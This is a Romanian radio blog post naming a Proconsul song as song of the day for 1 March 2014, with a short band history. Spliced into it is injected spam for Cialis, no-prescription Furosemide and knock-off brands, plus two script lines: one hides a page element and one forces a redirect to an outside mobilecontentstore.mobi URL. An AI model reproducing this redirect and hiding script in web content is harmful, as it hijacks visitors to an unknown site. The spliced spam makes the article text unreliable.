Melodia zilei de 1 Martie 2014

 

Proconsul – “Acolo unde esti”

In 1999 devin cunoscuti, desi cantau de mult timp impreuna , cu maxi single-ul de debut De la rusi… Convinsi ca pot reusi pe scena mare, isi schimba numele din Take five in Proconsul, si compun primele piese originale. Materialul care contine si piesele De la rusi…, Barosanu’. se bucura de succes imediat. In 2000, cu piesa Cerul obtin locul 3 la festivalul de la Mamaia, sectiunea creatie.

In anul 2001, Proconsul lanseaza un nou album: „Mi-ai luat inima”. Acest album a avut un succesc enorm cu singel-uri ca: Zbor, Mi-ai luat inima, Cerul, Despre tine, Spune-mi despre noi. In 2002 Karcsi paraseste formatia, locul lui fiind luat de Florin Barbu, ex Blazzaj, Timpuri Noi. Primul concert in noua componenta a fost pe 1 Martie, la Pitesti. Urmeaza apoi in 2004 albumul „5” care marcheaza cinci ani de Proconsul. Albumul contine numai piese de 5 stele ale celor cinci membrii. In 2005 concertul „Balade.Pentru tine” sustinut la Teatrul National din Bucuresti se bucura de o mare apreciere a publicului.

showthumb_resize.php generic sublingual Cialis 20 mg

Pentru Proconsul , 2013 a fost un an plin de realizari profesionale. In februarie, chiar de Ziua Indragostiților, trupa pop-rock a lansat single-ul ‘No matter what’, piesa care a dat și numele albumului lansat pe 9 mai și numele turneului național, ‘No matter what Tour’. Tot in 2013, Proconsul a avut o serie de colaborari muzicale inedite precum cea cu Dana Nalbaru și a fost cap de afiș al turneului național Mix Music Evo. essays helpers

Proconsul1011

Trupa Proconsul (in componența Dragos Dinca – chitara si voce,Valentin Petricenco – tobe, Bogdan Marin( Bodo) – voce, Robert Anghelescu – clape si voce, Robert Ursache – chitara bas, Liuben Gordievski – clape) promit fanilor pe 2014 un an la fel de incarcat de surprize muzicale.

O melodie frumoasa semnata de Proconsul – “Acolo unde esti”, este aleasa melodia zilei de 1 Martie 2014 la Radio Enigma Romania.

proconsul-site

O melodie superba pe care tu enigmatic/a… ai ales-o piesa zilei si pe care noi cei de la Radio Enigma Romania ti-o daruim cu mare drag si mereu cu acelasi mesaj: Simte, traieste si iubeste!

Haideti sa il ascultam si noi.

O zi frumoasa sa ai alaturi de cei dragi tie,
alaturi de Radio Enigma Romania -Vocea gandurilor tale.

document.getElementById(“Leyout101″).style.display=”none”;ray ban 3267
mens prada shoes
timberland sale
bicester village mulberry
No Script Usa Buy Furosemide online No Prescription Canada Cheap Lasix On Line Furosemide 40 mg Buy Online Canada Furosemide 40 mg Fast ShippingВ  timberland boots sale
abbigliamento uomo donna
hollister frankfurt
hogan uomo interactive
womens timberland boots
hermes bag

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *